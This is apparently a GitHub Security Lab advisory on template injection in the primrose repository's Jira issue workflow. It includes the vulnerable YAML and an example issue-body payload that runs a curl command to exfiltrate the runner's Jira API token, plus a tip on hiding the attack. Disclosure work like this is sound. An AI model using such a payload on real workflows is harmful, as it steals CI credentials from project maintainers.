skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
December 3, 2020

GHSL-2020-209: Template injection in a GitHub workflow of ww-tech/primrose repository

Jaroslav Lobacevski


Automatic GitHub workflow in ww-tech/primrose repository is vulnerable to template injection from user comments.


ww-tech/primrose repository

Tested Version

Master branch.


Issue: Hidden expression expansion of input parameters passed to atlassian/gajira-create

Jira Create issue step in issues.yml workflow is vulnerable to template injection.

${{ github.event.issue.title }} and ${{ github.event.issue.body }} are used to format input values to atlassian/gajira-create action:

    - name: Jira Create issue
      uses: atlassian/gajira-create@v2.0.0
        # Key of the project
        project: DS
        # Type of the issue to be created. Example: 'Incident'
        issuetype: Task
        # Issue summary
        summary: "${{ github.repository}} Issue #${{ github.event.issue.number}} ${{ github.event.issue.title}}"
        # Issue description
        description: ${{ github.event.issue.body}} ${{ github.event.issue.html_url}}

The action has a hidden feature - it expands {{}} internally. This way when the comment body contains an expression in double curly braces it is evaluated by node.js in these actions.


This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create an issue with the body:

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the issue to Never mind my bad and close it.

Coordinated Disclosure Timeline


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-209 in any communication regarding this issue.